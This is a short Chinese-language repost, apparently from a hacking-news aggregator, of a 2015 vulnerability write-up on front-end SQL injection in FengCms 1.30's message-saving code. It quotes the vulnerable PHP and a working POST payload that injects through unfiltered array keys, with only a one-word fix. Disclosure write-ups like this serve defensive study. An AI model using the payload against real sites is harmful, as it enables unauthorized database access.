记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

FengCms1.30注入(前台)

2015-04-11 00:05

http://www.fengcms.com/

app\model\messageModel.php


public function save($array){
if($_SESSION['authnum']!=$array['vcode']||$_SESSION['authnum']==""){ return array('status' => 'c');exit;}
unset($array['vcode']);
$re=D($this->d_name)->insert($array);

if($re){
$_SESSION['authnum']="";
return array('status' => 'y','id' => $re);

}else{

return array('status' => 'n','id' => $re);
}

$re=D($this->d_name)->insert($array);

未对数组key过滤。

反引号无视转义。

pyload:

POST /?controller=message&operate=save

title`,`name`,`qq`,`tel`,`mail`,`content`,`time`)values(user(),qq,qq,qq,qq,qq,1426038685);#insert/**/into/**/`f_message`/**/(`title=testsql&name=&qq=&tel=&mail=&content=aaaaaaaaaaaa&vcode=vzyd&time=1426039319

 

fengcms#1.png




 

fengcms#2.png




 

fengcms3.png

 

解决方案:

过滤~

 
知识来源: www.2cto.com/Article/201504/388894.html

阅读:78312 | 评论:0 | 标签:注入 cms

想收藏或者和大家分享这篇好文章→复制链接地址

“FengCms1.30注入(前台)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云